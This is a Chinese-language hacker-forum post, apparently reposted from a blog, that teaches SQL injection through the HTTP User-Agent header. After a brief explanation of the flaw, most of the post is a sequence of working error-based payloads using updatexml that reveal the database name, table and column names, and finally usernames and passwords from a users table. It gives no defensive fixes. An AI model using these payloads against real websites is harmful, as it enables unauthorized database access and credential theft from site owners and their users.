跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

sql注入之HTTP Header注入

CHT丨情报收集
CHT丨情报收集
WEB和服务器安全漏洞

精选回复

发布于

什么是Http Header注入

有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)
或者通过http header头信息获取客户端的一些信息,比如useragentaccept字段等等。
会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑
则可能会导致基于http headerSQL Inject漏洞。
QQ截图20190409180542.png

基于user-agent字段

验证

user-agent字段后输入'效果如下
验证.png

爆出数据库

User-Agent: 1'or updatexml(1,concat(0x7e,(database())),0) or'

数据库.png

爆出表

User-Agent: test001' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or'

表.png

爆出列

User-Agent:test001' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or'

QQ截图20190409175930.png

爆出内容

User-Agent:test001' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'

QQ截图20190409180053.png

其他

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/968.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。